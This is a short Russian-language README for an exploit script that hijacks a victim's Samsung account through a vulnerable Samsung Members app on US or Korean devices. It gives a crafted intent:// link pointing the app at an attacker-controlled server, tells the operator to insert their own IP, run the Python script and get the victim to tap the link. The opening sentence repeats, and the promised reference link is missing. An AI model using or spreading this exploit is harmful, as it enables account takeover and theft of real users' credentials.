
Этот скрипт может быть использован для получения доступа к аккаунту Samsung жертвы, если на её устройстве Samsung установлена определённая версия приложения Samsung Members, и если устройство жертвы относится к региону США или Кореи.
Этот скрипт может быть использован для получения доступа к аккаунту Samsung жертвы, если на её устройстве Samsung установлена определённая версия приложения Samsung Members, и если устройство жертвы из региона США или Кореи.
<a href="intent://launch?url=http://<attacker IP>:8000/yay.html&action=sso&from=ZZ&iso=ZZ#Intent;scheme=samsungrewards;package=com.samsung.android.voc;action=android.intent.action.VIEW;end;">yay click here yay</a>
ПРИМЕЧАНИЕ: замените "<attacker IP>" на IP-адрес, с которого вы будете запускать этот скрипт.
python3 ./samsung_account_access.py
С помощью телефона Samsung перейдите на веб-сервер и нажмите на ссылку
Позвольте скрипту сделать своё дело
Дополнительная информация об уязвимости, которую эксплуатирует этот скрипт, доступна здесь: